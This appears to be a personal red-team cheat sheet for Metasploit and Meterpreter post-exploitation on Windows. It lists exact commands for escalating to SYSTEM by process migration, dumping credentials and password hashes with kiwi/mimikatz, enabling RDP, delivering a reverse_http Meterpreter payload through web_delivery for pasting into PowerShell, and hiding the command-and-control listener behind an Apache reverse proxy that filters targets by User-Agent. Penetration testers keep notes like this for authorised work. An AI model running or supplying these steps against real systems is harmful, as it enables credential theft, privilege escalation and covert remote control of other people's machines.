The Real Hugo
Husk

Metasploit

  • -j Run job in background
  • sessions -i 1 interactive session 1

Meterpreter

post/multi/manage/shell_to_meterpreter
  • execute command
  • search files
  • download and upload files

Metasploit after gaining foothold

  • Meterpreter shell is opened on target. Run exploit suggester
run post/multi/recon/local_exploit_suggester
  • Decide on your exploit and background the meterpreter.
  • Use the exploit.
use <path/to/exploit>
  • Fill options like session and run the exploit

Privilege Escalation on Windows Using Metasploit

  • Find process with higher privs and migrate to it. Example spoolsv.exe.
migrate -N spoolsv.exe
  • After NT AUTHORITY\SYSTEM is gained start mimikatz. and dump all creds
load kiwi
help
creds_all
  • Enable RDP via run post/windows/manage/enable_rdp

Hashdump on Windows

  • Meterpreter
run post/windows/gather/hashdump

load kiwi
lsa_dump_sam

Webdelivery

use exploit/multi/script/web_delivery
show targets
set LPORT <attacker-Port>
set PAYLOAD windows/meterpreter/reverse_http
run -j
  • Copy into powershell/cmd

Reverse Proxy

  • Hide behind reverse proxy, e.g. apache
  • In case of an apache, these modules must be enabled
    • rewrite
    • proxy
    • proxy_http
    • headers
  • Use User-Agent to identify targets
<VirtualHost *:80>

    ServerAdmin webmaster@localhost
    DocumentRoot /var/www/html

    RewriteEngine On
    RewriteCond %{HTTP_USER_AGENT} "^User-Agent$"
    ProxyPass "/" "http://localhost:8080/"

    <Directory>
        AllowOverride All
    </Directory>

    ErrorLog ${APACHE_LOG_DIR}/error.log
    CustomLog ${APACHE_LOG_DIR}/access.log combined

</VirtualHost>